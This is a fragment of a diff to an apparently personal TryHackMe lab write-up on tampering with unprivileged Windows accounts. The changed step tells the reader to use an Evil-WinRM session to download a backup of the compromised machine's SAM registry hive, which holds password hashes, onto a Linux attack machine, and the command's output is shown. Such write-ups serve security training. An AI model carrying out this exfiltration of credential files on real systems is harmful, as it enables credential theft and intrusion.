JonmarCorpuz/Writeups/TryHackMe Module Task Writeups/Tampering With Unprivileged Accounts.md

 Info: Download successful!
 ```
-13. `download {FILENAME2}.bak` to download the backup file of the compromised Windows machine's **SAM** registry key from their system onto our Linux attack machine
+13. `download {FILENAME2}.bak` from the command line in our active WinRM session to download the backup file of the compromised Windows machine's **SAM** registry key from their system onto our Linux attack machine
 ```Bash
 *Evil-WinRM* PS C:\> download SAM.bak
 Info: Downloading C:\\SAM.bak to SAM.bak